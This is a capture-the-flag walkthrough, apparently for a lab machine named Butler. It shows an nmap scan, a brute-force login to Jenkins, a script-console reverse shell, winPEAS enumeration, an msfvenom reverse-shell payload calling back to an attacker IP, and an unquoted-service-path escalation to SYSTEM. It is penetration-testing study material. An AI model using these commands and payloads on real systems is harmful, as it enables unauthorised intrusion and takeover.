Redefine Success
It All Begins Here
The program Nmap was used, attempting to enumerate information about the ports on the target machine, “nmap Target machine IP -A -p- -T4 -Pn -oA nmap”.
There was a website on port 8080, running ‘Jetty 9.4.41v20210516’, the robots.txt file disallows ‘/’.
A dirbuster scan was run.
Nothing relevant was shown from the dirbuster results or inspection of other ports. A brute force attack is attempted using the “Cluster Bomb” function of burpsuite, and after noticing a PHP Session Cookie was assigned, a username and password, both fields being “jenkins”, gave a successful login.
The alert icon gave warnings about security vulnerabilities within the Jenkins app.
Seeing, what was available in the ‘Manage Jenkins’ section, a script console application was accessible. After doing some research, arriving at “https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76”, there was a simple script that could be run to gain shell access to the system.
After setting up a netcat listener on the attacking system and clicking run, a shell is received as the butler user.
The “powershell” command was run, followed by: “wget “https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe” -OutFile winpeas.exe””. This grabbed the latest version of winpeas.exe, a common privesc utility used on Windows machines from the github repository.
Then winpeas.exe was run with “./winpeas.exe”.
In the results, there is a program “WiseTray.exe” that is run at the log in of any user; this program has unquoted spaces in its filepath which, if one has write permissions to the folder (Wise Care 365), a file could be created in order to run an arbitrary executable file.
Msfvenom was used to create the malware used for a reverse shell. “msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING IP LPORT=1337 -f exe > ~/practicalpentesting/butler/Wise.exe”.
After navigating to the directory where the ‘virus.exe’ file was left, a simple python web server was created in order to pull the file to the target machine. “python -m http.server”.
The file was pulled to the ‘\Wise Care 365’ folder with powershell and wget.
Powershell was exited while in the ‘Wise’ folder, and a command prompt is entererd with “cmd.exe”. A netcat listener is set up on port 1337. Then, the program was stopped and restarted in order for it to to be run as the system.
A shell is received as ‘nt authority\system’.